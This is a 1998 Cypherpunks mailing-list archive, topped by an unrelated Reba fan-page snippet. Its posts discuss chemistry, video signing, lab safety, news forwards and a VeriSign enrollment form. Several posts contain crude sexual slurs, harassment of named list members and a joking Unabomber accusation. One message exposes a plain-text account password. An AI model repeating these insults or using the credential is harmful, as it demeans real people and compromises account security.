Reba is nominated for Favorite Female Country Artist!

American Music Awards
ABC -TV
8:00-11:00pm EST (Please check your local listings for times)






RebaNews
Copyright 1998 Starstruck Entertainment, All rights reserved.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Tue, 27 Jan 1998 14:29:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: State of the Union Address
In-Reply-To: <199801241849.NAA17756@myriad>
Message-ID: <19980126222308.60967@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, Jan 26, 1998 at 09:36:59AM -0500, Rabid Wombat wrote:
> 
> 
> 
> On Sat, 24 Jan 1998, Matthew Ghio wrote:
> 
> > Anonymous wrote:
> > 
> > > [1] Grab a totally random sample of 100 high school students. Haul the
> > >     students out one at a time and ask them the following questions:
> > [snip]
> > > 11) Michelle mixes one gram of HCl and one half gram of NaOH. Under normal
> > >     circumstances, what is produced and in what quantities?
> > > 
> > 
> > The correct answer is an explosion and a big mess.  One student in my high
> > school chemistry class learned this the hard way.  :)
> > 
> > 
> 
> Um, salt water explodes?

Well, if it was 40 grams of NaOH and 36.5 grams of HCl, then you 
would have 18 grams of water and 58.5 grams of NaCl.  With 1g HCl to 
.5g NaOH, well, you have an acidic, salty, mess.  However, HCl 
is a gas at STP, and NaOH is a solid...

Basically, it's an incredibly poorly worded question.

-- 
Kent Crispin, PAB Chair			"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 13:19:42 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Signing video... (fwd)
Message-ID: <199801270516.XAA31427@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 26 Jan 1998 19:43:17 -0800
> From: Steve Schear <schear@lvdi.net>
> Subject: Re: Signing video...

> >I was exchangin idea with a couple of members off-list and an idea came to
> >me about how to time stamp the frames. It would require a minor modification
> >to the WWV transmission but it wouldn't be much. Have the WWV transmitters
> >sign each 'tick' of the clock and have a WWV receiver in the vcr. This would
> >allow time stamping the frame with a signed reference that could be checked.
> 
> Although this could reduce the cost and power consumption in the camera how
> does this guarantee that the signature information wasn't inserted later.
> With today's excellent digital postprocessing it could be very hard to
> detect.

The fact that it's hard is what makes it worth doing in some environments.

The goal is to provide a reasonable doubt as to the validity of the picture
on the tape.

Don't know about cost and power consumption...but this is where I'm at
on this issue now, by no means is it fully worked out:

The actual signal on the tape can be mapped to a specific head mechanism
using the same sorts of technology that is used to identify specific cell
phones from the rf signature. So we can do an analysis of the signal and
verify if a given camera striped the tape. Hysterisis, amplifier slew rates,
power spectrum analysis, etc.

The pattern of wow and flutter of any motor and drive mechanism is unique
and can also be mapped to a specific mechanism. This wow and flutter creates
regular and repeatable irregularities in the pattern on the tape. This
allows us to match a drive mechanism to a specific program on a tape.
Irregularities in the drive wheel will cause specific pattern in the way the
stripes are laid down (ie wiggles in the same place each time that part of
the wheel comes around).

Irregularities in the syncronizing clocks in the tape mechanism can be
traced to particular oscillators (usualy slew rate as a function of
frequency stability).

By signing the frames with a signed time reference we can verify which clock
was used, though we can't verify that it wasn't recorded and played back at
a later time. We can at least verify the tape wasn't stiped prior to the
claimed time. For security applications this could be quite useful.

So if we have a fully analog system there are several means to test the
various parts of the systems to verify source veracity. We can also test the
tape recording mechanism even on a digital or hybrid system.

So let's look at hybrid systems where the video signal is source digital or
is digitized in the camera (for special effects, etc.).

If a frame isn't signed we don't trust it.

So we have a camera with a ROM that has a signature. We could replace the
code in the rom and keep the signature. If the owner doesn't replace the ROM
prior to testing then we can easily verify the ROM and it's signature don't
match. We don't even need the signature to do this, simple comparison
between the rom that should be there versus the one that is present is
enough.

If they do replace the ROM then we have a frame that is signed but potentialy
modified prior to the d/a conversion process. The question is can we in fact
identify such non-linear editing? If the answer is no then there is a clear
reason to suspect the validity of any video source that went through any
sort of digital processing.

I suspect the answer is no since this question is equivalent to signing a
document that was modified prior to the signature being placed on it. The
signature process only signs what was fed into the algorithm and can't
detect changes to the document prior to the signing.



    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 14:02:15 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Organic Chemistry Lab Safety
Message-ID: <199801270555.XAA31566@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

The question was asked why mixing acids and bases are hazardous. Please
note number 5 below. When an acid and base are mixed you get water and a
salt. When water is added to acid (ie pouring a base into an acid) the heat
of reaction can cause the water to get quite hot and cause the chemicals
to splatter upon you. The idea is you want the acid to disolve in the water
and not the other way around. Goggles, bibs, and all other reasonable safety
precautions should always be used.

Forwarded message:

> X-within-URL: http://www.ems.uwplatt.edu/sci/chem/saf/safetyor.htm

> ORGANIC CHEMISTRY LABORATORY SAFETY RULES
> 
>      * 1. Maintain a business-like attitude. Be prepared! Do not attempt
>        unauthorized experiments.
>      * 2. Wear safety goggles (eye protection) at all times when in the
>        laboratory. This is a departmental and state regulation. Do not
>        eat or drink in the lab or bring food or drink into the lab.
>      * 3. Know the location and use of the nearest fire extinguisher,
>        nearest First Aid kit, nearest eye wash station, nearest safety
>        shower, and nearest exit designated for evacuation. Know the
>        location of the Material Safety Data Sheets (MSDS) and know that
>        you have access to them. Know the NFPA (National Fire Protection
>        Association) Hazardous Material Classification Codes.
>      * 4. Report any accident, even minor injuries, to the instructor at
>        once.
>      * 5. When diluting acids, pour acid slowly and carefully into the
>        water with constant stirring. Use Pyrex and Kimax glassware and
>        NEVER add water to acid. Rinse acid or base Penny-Head stoppered
>        bottles under the faucet after each use.
>      *
>    6. In the event that acid, base, or any corrosive liquid is spilled on
>        your person:
>        a) Flush immediately with running water at the sink. Call for
>        instructor.
>        b) Rinse area with 5% sodium bicarbonate solution.
>        c) Wash area with soap and water, blot dry with clean towel or
>        handkerchief.
>        d) Follow direction of lab supervisor. Check MSDS if you have
>        questions.
>      * 7. In case of an organic chemical spilled on your person, flush
>        with water, wash with soap, rinse with water, rinse with ethyl
>        alcohol, wash with soap, and rinse with water. Pat dry. Wash hands
>        before and after visiting toilet. Check MSDS if you have
>        questions.
>      * 8. Never taste chemicals or solutions. Minimize the inhalation of
>        organic vapors by using the smallest amounts of materials and
>        utilizing the hood as much as possible. Check MSDS if you have
>        questions.
>      * 9. Many organic compounds are either carcinogenic, mutagenic,
>        and/or teratogenic. Generally avoid aromatic amines and nitroso
>        compounds. Review the document on Chemical Exposure in Organic
>        Chemistry. Check the MSDS if you are not adequately aware of the
>        compound's properties.
>      * 10. In case of cuts or punctures, flush with running water, and
>        call for instructor or see stock room attendant on third floor for
>        First Aid. All punctures should be seen by the university nurse or
>        a physician!
>      * 11. Dispose of all wastes properly. Read labels on bottles! Keep
>        bench and floor clean.
>      * 12. Before leaving the laboratory, be sure that the water, steam,
>        heaters, and gas cocks are shut off.
>        
>    | Chemistry Home | UW-Madison Safety | sundin@uwplatt.edu |
>    
>    
>    Document Last Modified: August 26, 1997
>    Copyright (c) 1998, University of Wisconsin - Platteville
> 


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 14:13:09 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Intel drops prices [CNN]
Message-ID: <199801270558.XAA31625@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    Company cuts price tag of older models
>    by up to 51 percent
>    
>    January 26, 1998: 9:14 p.m. ET
>    
>    
>    Intel
>    More related sites... SAN FRANCISCO (Reuters) - Semiconductor giant
>    Intel Corp. Monday unveiled its fastest version of the Pentium II
>    processor for desktop computers, servers and workstations and cut
>    prices on older chips by up to 51 percent.
>    [INLINE] Several major PC makers introduced new PCs, servers and
>    workstations around the new Pentium II chip, which runs at 333
>    megahertz, and is priced at $721 each, in units of 1,000.
>    [INLINE] Hewlett-Packard Co., Packard Bell NEC Inc. and Gateway 2000
>    Inc. unveiled new computers using the 333-megahertz processor on
>    Monday, some with prices starting at around $2,800.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 14:05:16 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Computer makers speed up Internet [CNN]
Message-ID: <199801270559.XAA31665@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                COMPUTER, PHONE COMPANIES SEEK TO SPEED INTERNET
>                                        
>      graphic January 26, 1998
>      Web posted at: 9:46 p.m. EST (0246 GMT)
>      
>      WASHINGTON (CNN) -- Top computer firms Compaq, Intel and Microsoft
>      and leading telephone and networking companies Monday announced an
>      alliance to promote high-speed Internet links over ordinary phone
>      lines.
>      
>      Telephone companies banded together and sought support from the
>      high-tech giants to ward off a competing scheme for faster Internet
>      connections relying on cable television wires.
>      
>      The phone group said it will offer the International
>      Telecommunications Union, which sets industry standards, a uniform
>      method of connecting to the Internet using "asymmetric digital
>      subscriber line" technology, or ADSL. Equipment makers plan to offer
>      products based on the standard.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 27 Jan 1998 15:58:00 +0800
To: "cypherpunks@cyberpass.net>
Subject: RE: Announcement: RPK InvisiMail released on 12 Jan, 1998
In-Reply-To: <01BD2A7C.342CBB60@joswald@rpkusa.com>
Message-ID: <3.0.5.32.19980127005058.0087ea90@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks for an interesting perspective on working with NZ's export 
bureaucrats.

At 04:59 PM 1/26/98 -0800, Jack Oswald  <joswald@rpkusa.com> wrote:
>Bill - The technology that we export as part of RPK InvisiMail, is 
>world-class strong crypto.  Key size options are 607 bits and 1279.  The 
>math behind the system is based on the same as that of D-H.  There is no 
>snake oil.  There was no intentional or unintentional attempt to mislead 
>any government authority.  We also did not request an export license, 
>because there is no need to do so in New Zealand as long as the export is 
>by means of the Internet.  Peter G. knows this as well.  The story may be 
>different for physical export on disk, disc or tape, although we cannot 
>concur with Peter's personal experience.  Our experience is that we get 
>pretty good treatment from the NZ authorities.  We also may use a different 
>approach.  I have often heard that you can often get a better response when 
>using honey than vinegar.  Therein may explain differences in our 

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Wed, 28 Jan 1998 05:37:22 +0800
To: Blanc <cypherpunks@cyberpass.net
Subject: Re: Executing Kaczynski
In-Reply-To: <3.0.5.32.19980127201813.008249e0@cnw.com>
Message-ID: <3.0.5.32.19980127010704.007bc330@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



bAt 08:18 PM 1/27/98 -0800, Blanc wrote:
>Vladimir Ze Cornflake inquired of TCM:
>
>>> Recall that a leading Cypherpunk was suspected
>>>for a while as being the Unabomber.
>>
>>whoa, are you being facetious here or what? would you care to elaborate
>>on that little tidbit?
>.................................................
>It was TCM himself.
>(myself, I speculated it was Detweiler.)

Eric Hughes was the Berkeley student of esoteric mathematics
who was good at woodworking.  He'd have been pretty young when
he started his Life Of Crime, but he always was precocious :-)
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: id-center@verisign.com
Date: Tue, 27 Jan 1998 22:06:09 +0800
To: cypherpunks@Algebra.COM
Subject: NetCenter Member Services - VeriSign Digital ID Request
Message-ID: <199801271354.FAA24086@lumbago.verisign.net>
MIME-Version: 1.0
Content-Type: text/plain



  Dear NetCenter Member:

Thank you for requesting information about VeriSign Digital IDs from Netscape's
Netcenter.  A VeriSign Digital ID provides a means of proving your identity in 
electronic transactions, much like a driver license or a passport does in 
face-to-face interactions.  By using your Verisign Digital ID you can:

  *Sign your e-mail.  Recipients are assured that the information they receive 
  is from you, and hasn't been altered in any way by outside tampering.   

  *Encrypt and decrypt e-mail.  This assures no one except the intended 
  recipient can view its contents. 

In addition:

VeriSign's new public directory is your "white pages" for Digital IDs. Look up
anyone's Digital ID. Then send and receive signed and encrypted e-mail --
all from within Netscape Messenger. (If you use another email package you can 
still easily access the directory from VeriSign's web site.)

Your browser will automatically store your Digital ID and present it for you at
participating sites.  This means no longer remembering multiple passwords to 
gain access to these sites.

You automatically receive the peace-of-mind of US $1,000 NetSure(sm) protection 
against economic loss caused by corruption, loss or misuse of your Digital ID 
(not available with free trial ID). 

For more information about Digital IDs and how they are used, please visit 
http://www.verisign.com/products/individual/index.html.
To enroll for a VeriSign Class 1 Digital ID, please complete the form below, 
read our Subscriber Agreement, then click the Accept button.  If you are not 
using Netscape Mail, you may not be able to view the form below.  Please visit 
our Digital ID Center at http://digitalid.verisign.com/class1Netscape.htm to 
enroll for your free Class 1 Digital ID.



Title: VeriSign















        
        
           
        
        
	
        
        










        
Class 1 Digital ID






















STEP 1: Contents of Your Digital ID.  This information is included in the Digital ID which is available to the public.





        NOTE: Please complete with no punctuation. Please use only the English alphabet with no accented characters.


  
  
    First name:
  
    
  


  
  
    Last name:
  
    
  


  
  
    Email address:
  
    
  


  
  
    Include email address in your Digital ID?
  Yes No

  Answer Yes to use your ID for sending and receiving secure email.


  








STEP 2: Easy Web Site Registration



        You have the option of including this one-step registration information in your Digital ID (which is also available to the public), in order to use it for "one-step registration" at participating websites and customized information services.






        
        
        
        Personalize your Digital ID?
        

        YesNo
        
        
        





         
        
        
        Country:
        

        
                Australia 
                Austria 
                Belgium 
                Brazil 
                Canada 
                China 
                Denmark 
                Finland 
                France  
                Germany 
                India 
                Israel 
                Italy 
                Japan 
                Mexico 
                Netherlands 
                Norway
                Philippines
                Singapore
                South Africa 
                Spain 
                Sweden 
                Switzerland 
                Taiwan
                United Kingdom 
                United States
                Other Countries
                
    
        
        
        





        
        
        
        Zip or postal code:
        

        
        
        
        
        





        
        
        
        Date of birth:(MMDDYYYY)
        

        
        
        
        (Example: 12251966)
        





        
        
        
        
        

        Male Female
        
        
        
        





        

        









STEP 3: Choose a Challenge Phrase




        A challenge phrase enables you to cancel and replace your Digital ID (i.e., if you change computers, software, etc). The challenge phrase is only known by you and should be kept in a safe place - you must have it to cancel your Digital ID if it is compromised or stolen.




        

        Challenge phrase:
        

        
        
        
        No punctuation, please.



        

        





STEP 4: Choose Full Service Class 1 Digital ID or 60 day Free Trial


	
	A full service Digital ID comes with these features:
        
        Send and receive secure e-mail (via S/MIME)
        Replaces passwords and enables one-step registration at participating websites
        VeriSign Customer Care, 24 hours a day, 7 days a week
        Automatic Enrollment in $1,000 
        NetSureSM Protection Plan 
        Free replacement and revocation of your Digital ID should it be lost or corrupted
                
        


	
      
        I'd like a full service  Digital ID for only US$9.95. (Please complete Step 5.)

        I'd like to test drive a 60-day trial Digital ID for free. (does not include revocation, replacement, the NetSure Protection Plan or premium customer care)
       






STEP 5: Finalize Enrollment



  Your Digital ID is valid for a one year period. Your credit card will be charged US$9.95 when you click the Accept button below. All enrollment and credit card information is transmitted securely using the Secure Sockets Layer (SSL) protocol.  This information is kept confidential and is not included in your Digital ID.

  


  
  Card type:
  
  
         Visa
         MasterCard
         Discover
         American Express
        
        
        
        
        


        
        
        
        Card number:
        

        
        
        
        
        





        
        
        
        Expiration date:
        

        
                01
                02
                03
                04
                05
                06
                07
                08
                09
                10
                11
                12
        
                
                97
                98
                99
                00
                01
                02
        
        






        
        Name on card:
        
        
        
        
        





        
        





        
        
        
        Street number:
        

        
        
        
        
        





        
        
        
        Street name:
        

        
        
        
        
        





        
        
        
        Apt. #:
        

        
        
        
        
        





        
        





         
        
        
        City:
        

        
        
        
        
        





        
        
        
        State/Province:
        

        
        
        
        
        





        
        
        
        Zip/Postal Code:
        

        
        
        
        
        





        
        
        
        Country:
        

        
                Australia 
                Austria 
                Belgium 
                Brazil 
                Canada 
                China 
                Denmark 
                Finland 
                France  
                Germany 
                India 
                Israel 
                Italy 
                Japan 
                Mexico 
                Netherlands 
                Norway 
                South Africa 
                Spain 
                Sweden 
                Switzerland 
                United Kingdom 
                United States
                Other Countries
                
        
        





        
        








        PLEASE READ THIS SUBSCRIBER AGREEMENT BEFORE APPLYING FOR, ACCEPTING, OR USING A DIGITAL ID/CERTIFICATE. IF YOU DO NOT AGREE TO THE TERMS OF THIS SUBSCRIBER AGREEMENT, PLEASE DO NOT APPLY FOR, ACCEPT, OR USE THE DIGITAL ID (CERTIFICATE).
        







        
        
                
THIS SUBSCRIBER AGREEMENT will become effective on the date you submit the certificate application to the designated issuing authority (IA). By submitting this Subscriber Agreement (and certificate application) you are requesting that the IA issue a Digital ID (certificate) to you and are expressing your agreement to the terms of this Subscriber Agreement. VeriSign's Public Certification Services are governed by VeriSign's Certification Practice Statement (the "CPS") as amended from time to time, which is incorporated by reference into this Subscriber Agreement. The CPS is published on the Internet in VeriSign's repository at https://www.verisign.com/repository and ftp://ftp.verisign.com/repository/CPS and is available via E-mail from:  CPS-requests@verisign.com. Amendments to the CPS are also posted in VeriSign's repository at https://www.verisign.com/repository/updates.

YOU AGREE TO USE THE DIGITAL ID (CERTIFICATE) AND ANY RELATED IA SERVICES ONLY IN ACCORDANCE WITH THE CPS. 

NETSURE(SM) NOTICE: THE NETSURE(SM) CERTIFICATES ISSUED UNDER THIS AGREEMENT AND OTHER AGREEMENTS AND THEIR EFFECTIVE DATES UNDER THE NETSURE(SM) PROTECTION PLAN ("PLAN") ARE LISTED AT HTTPS://WWW.VERISIGN.COM/REPOSITORY/NSCERTS.HTML. 

EFFECTIVE MAY 30, 1997, IF YOU OBTAINED A NETSURE(SM) CERTIFICATE, THE PLAN PROVIDES YOU WITH CERTAIN LIMITED WARRANTIES, DISCLAIMS ALL OTHER WARANTIES, INCLUDING WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, AND LIMITS LIABILITY. FOR INFORMATION ON THE PLAN, SEE HTTPS://WWW.VERISIGN.COM/REPOSITORY/NETSURE. 

OTHERWISE, THE IA PROVIDES LIMITED WARRANTIES, DISCLAIMS ALL OTHER WARANTIES, INCLUDING WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, LIMITS LIABILITY, AND EXCLUDES ALL LIABILITY FOR INCIDENTAL, CONSEQUENTIAL, AND PUNITIVE DAMAGES AS STATED IN THE CPS. SEE THE CPS FOR IMPORTANT DETAILS.

YOU DEMONSTRATE YOUR KNOWLEDGE AND ACCEPTANCE OF THE TERMS OF THIS SUBSCRIBER AGREEMENT BY EITHER (I) SUBMITTING AN APPLICATION FOR A DIGITAL ID (CERTIFICATE) TO VERISIGN, OR (II) USING THE DIGITAL ID (CERTIFICATE), WHICHEVER OCCURS FIRST.

                
    







        



        
        

         
        

        Read CPS or Download CPS

If you agree to the terms of the Subscriber Agreement, please click Accept to continue.
        
        




        
        

         
        

         
        
        













        

        




        Optional Enhancement





        If you use the standard version of Netscape Navigator or Communicator, choose 512 from the list below. If you use the US-only version, you can choose 768 or 1024 for greater security. 
  
        




        
        





        
        
        
                
        
        
        
        
        




        
        





































Copyright (c) 1997, VeriSign, Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 27 Jan 1998 21:48:56 +0800
To: cypherpunks@toad.com
Subject: Re: State of the Union Address
In-Reply-To: <Pine.BSF.3.91.980126093631.12571B-100000@mcfeely.bsfs.org>
Message-ID: <ZouyJe11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Rabid Wombat <wombat@mcfeely.bsfs.org> writes:

> On Sat, 24 Jan 1998, Matthew Ghio wrote:
>
> > Anonymous wrote:
> >
> > > [1] Grab a totally random sample of 100 high school students. Haul the
> > >     students out one at a time and ask them the following questions:
> > [snip]
> > > 11) Michelle mixes one gram of HCl and one half gram of NaOH. Under norma
> > >     circumstances, what is produced and in what quantities?
> > >
> >
> > The correct answer is an explosion and a big mess.  One student in my high
> > school chemistry class learned this the hard way.  :)
> >
>
> Um, salt water explodes?

Where is Jim Bell when we need him?

(Hell, where's Lorena Bobbt when we need her?)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: members@feedme.org (feedME)
Date: Tue, 27 Jan 1998 22:12:55 +0800
To: cypherpunks@toad.com (cypherpunks)
Subject: feedME account
Message-ID: <199801271349.IAA17868@thunder.ica.net>
MIME-Version: 1.0
Content-Type: text/plain



-----------------------------------------------------------
            feedME - the world's easiest newsreader        
                     http://www.feedME.org                 
-----------------------------------------------------------

Your Username is: cypherpunks
Your Password is: kimkdqof

If you have any problems, queries or suggestions please email:
           admin@feedme.org

You should change your password as soon as possible (if
you haven't already done so), the address for changing it is:
           http://www.feedme.org/changepass.html

Remember that we don't allow anyone to SPAM through feedME,
nor do we let people post any form of commerical or web-site
advertisements - if you are unclear always mail admin.

Regards,
Michael Bennett
Creator of feedME





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 28 Jan 1998 00:35:00 +0800
To: cypherpunks@toad.com
Subject: Re: Latest Clinton dodge?
In-Reply-To: <199801271220.NAA29561@basement.replay.com>
Message-ID: <8g3yJe1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



nobody@REPLAY.COM (Anonymous) writes:

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Dr.Dimitri Vulis KOTM, Noted Penis Expert, wrote:
> >
> > "Roger J Jones" <cyber@ibpinc.com> writes:
> > >
> > > Thanks for the info - while I am at it - has anyone ever disclosed
> the
> > > "distinguishing characteristic" that Paula Jones claims will prove
> its Bubba
> > > Bill?
> > >
> > Can you spell "curvature"?
> 
> It figures that Dimitri would know this. He seems to know all
> about Tim's and Sameer's and John Gilmore's penises too. Must be
> all that extensive taste-testing...
> 
>  - Frondeur

Bobbi Inman is a cocksucker.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 28 Jan 1998 14:27:51 +0800
To: Ryan Anderson <ryan@michonline.com>
Subject: Re: State of the Union Address
In-Reply-To: <Pine.GSO.3.95.980127171020.11874B-100000@king>
Message-ID: <Pine.BSF.3.91.980127111209.14544B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 27 Jan 1998, Ryan Anderson wrote:

> On Mon, 26 Jan 1998, Rabid Wombat wrote:
> 
> > > > [1] Grab a totally random sample of 100 high school students. Haul the
> > > >     students out one at a time and ask them the following questions:
> > > [snip]
> > > > 11) Michelle mixes one gram of HCl and one half gram of NaOH. Under normal
> > > >     circumstances, what is produced and in what quantities?
> > > > 
> > > 
> > > The correct answer is an explosion and a big mess.  One student in my high
> > > school chemistry class learned this the hard way.  :)
> > > 
> > Um, salt water explodes?
> 
> >From my high-school chemistry, neutralization makes slatwater and a lot of
> heat....  (Or that's what the teacher claimed)... Without a way to dump
> the pressure generated this way, yes you could have an explosion...
> 

Time to go back to high school. It's just a molocule swap. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 28 Jan 1998 01:41:51 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Physical Meet: Feb. 21 (fwd)
Message-ID: <199801271736.LAA00348@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 27 Jan 1998 11:28:34 -0600
> From: "Troy A. Bollinger" <troy@austin.ibm.com>
> Subject: Re: Physical Meet: Feb. 21

> Quoting Jim Choate (ravage@ssz.com):
> > 
> > Ok, looks like the magic day is Saturday Feb. 21, 1998 from 6-7pm.
> > 
> > So, now all we need is a place...
> > 
> 
> Flipnotics worked last time.
> 
> I'd like to suggest that everyone bring a printout of their PGP
> fingerprint so we can sign each other's keys.

I think I can make this one. I don't have any interest in signing or being
signed however, thanks for the offer.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mix <mixmaster@remail.obscura.com>
Date: Wed, 28 Jan 1998 04:13:38 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199801271939.LAA19093@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



The only `culture' Timothy `C' Maypole possesses is that 
cultivated from his foreskin scrapings.

        ,/         \,
       ((__,-,,,-,__)), Timothy `C' Maypole
        `--)~   ~(--`
       .-'(       )`-,
       `~~`d\   /b`~~`
           |     |
           (6___6)
            `---`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Blair <jdblair@frodo.tucc.uab.edu>
Date: Wed, 28 Jan 1998 02:10:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Latest Clinton dodge?
In-Reply-To: <8g3yJe1w165w@bwalk.dm.com>
Message-ID: <199801271757.LAA14080@frodo.tucc.uab.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----



dlv@bwalk.dm.com said:
>> It figures that Dimitri would know this. He seems to know all
>> about Tim's and Sameer's and John Gilmore's penises too. Must be
>> all that extensive taste-testing...
>> 
>>  - Frondeur

> Bobbi Inman is a cocksucker.

Ahh... I remember now why I re-subscribed to Cypherpunks.  It was for 
all of the intelligent discussion that goes on here.  At least back 
in the days of Detweiler the character assassination was creative and 
often fun to read.

Can you please keep childish shots like this in private e-mail?  It 
has no place in this mailing list.

 -john.



......................................................................
.                                                                    .
.....John.D.Blair...   mailto:jdblair@uab.edu   phoneto:205.975.7123 .
                   .   http://frodo.tucc.uab.edu  faxto:205.975.7129 .
 ..sys|net.admin....                                                 .
 .                     the university computer center            .....
 ..... g.e.e.k.n.i.k...the.university.of.alabama.at.birmingham....




-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBNM4gCgJjTpK3AXhBAQHC/QQArCwnCHSCzgmUGjGkGtAEtkwnsiq8rbF8
